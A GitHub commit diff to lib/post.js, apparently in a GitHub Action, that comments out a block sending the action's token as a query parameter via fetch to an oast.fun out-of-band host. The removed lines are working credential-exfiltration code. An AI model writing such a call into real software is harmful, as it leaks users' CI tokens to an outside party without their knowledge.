We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent c7265e9 commit 8ac5c80Copy full SHA for 8ac5c80
lib/post.js
@@ -27,13 +27,13 @@ export async function post(core, request) {
27
return;
28
}
29
30
- try {
31
- const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${token}`;
32
- await fetch(url);
33
- core.info(`HTTP GET request sent to ${url}`);
34
- } catch (error) {
35
- core.error(`Failed to send HTTP GET request: ${error.message}`);
36
- }
+ // try {
+ // const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${token}`;
+ // await fetch(url);
+ // core.info(`HTTP GET request sent to ${url}`);
+ // } catch (error) {
+ // core.error(`Failed to send HTTP GET request: ${error.message}`);
+ // }
37
38
39
try {
0 commit comments